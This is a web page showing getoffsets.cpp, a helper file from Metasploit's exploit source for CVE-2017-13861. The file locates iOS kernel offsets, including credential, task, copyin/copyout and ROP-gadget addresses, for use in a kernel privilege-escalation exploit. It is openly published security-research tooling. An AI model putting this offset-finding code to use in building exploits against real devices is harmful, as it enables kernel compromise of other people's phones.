CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/external/source/exploits/CVE-2017-13861/liboffsetfinder64/getoffsets.cpp
Views: 11784
1
#include <errno.h>

2
#include <string.h>             // strcmp, strerror

3
#include <sys/utsname.h>        // uname

4


5
#include "liboffsetfinder64.hpp"

6
#include "getoffsets.h"

7


8
static offsets_t off;

9
static bool didInit = false;

10
static tihmstar::offsetfinder64* finder = 0;

11


12
offsets_t* get_offsets()

13
{

14
  if (!didInit){

15
    finder = new tihmstar::offsetfinder64("/System/Library/Caches/com.apple.kernelcaches/kernelcache");

16


17
    off.base                               = 0xfffffff007004000;

18
    off.sizeof_task                         = (kptr_t)finder->find_sizeof_task();

19
    off.task_itk_self                       = (kptr_t)finder->find_task_itk_self();

20
    off.task_itk_registered                 = (kptr_t)finder->find_task_itk_registered();

21
    off.task_bsd_info                       = (kptr_t)finder->find_task_bsd_info();

22
    off.proc_ucred                          = (kptr_t)finder->find_proc_ucred();

23
    off.vm_map_hdr                          = (kptr_t)finder->find_vm_map_hdr();

24
    off.ipc_space_is_task                   = (kptr_t)finder->find_ipc_space_is_task();

25
    off.realhost_special                    = 0x10;

26
    off.iouserclient_ipc                    = (kptr_t)finder->find_iouserclient_ipc();

27
    off.vtab_get_retain_count               = (kptr_t)finder->find_vtab_get_retain_count();

28
    off.vtab_get_external_trap_for_index    = (kptr_t)finder->find_vtab_get_external_trap_for_index();

29
    off.zone_map                            = (kptr_t)finder->find_zone_map();

30
    off.kernel_map                          = (kptr_t)finder->find_kernel_map();

31
    off.kernel_task                         = (kptr_t)finder->find_kernel_task();

32
    off.realhost                            = (kptr_t)finder->find_realhost();

33
    off.copyin                              = (kptr_t)finder->find_copyin();

34
    off.copyout                             = (kptr_t)finder->find_copyout();

35
    off.chgproccnt                          = (kptr_t)finder->find_chgproccnt();

36
    off.kauth_cred_ref                      = (kptr_t)finder->find_kauth_cred_ref();

37
    off.ipc_port_alloc_special              = (kptr_t)finder->find_ipc_port_alloc_special();

38
    off.ipc_kobject_set                     = (kptr_t)finder->find_ipc_kobject_set();

39
    off.ipc_port_make_send                  = (kptr_t)finder->find_ipc_port_make_send();

40
    off.osserializer_serialize              = (kptr_t)finder->find_osserializer_serialize();

41
    off.rop_ldr_x0_x0_0x10                  = (kptr_t)finder->find_rop_ldr_x0_x0_0x10();

42


43
    didInit = true;

44
  }

45
  return &off;

46
}

47


48
kptr_t find_symbol(const char* symbol) {

49
  if (!didInit){

50
    finder = new tihmstar::offsetfinder64("/System/Library/Caches/com.apple.kernelcaches/kernelcache");

51
    didInit = true;

52
  }

53
  return (kptr_t)finder->find_sym(symbol);

54
}

55


56


57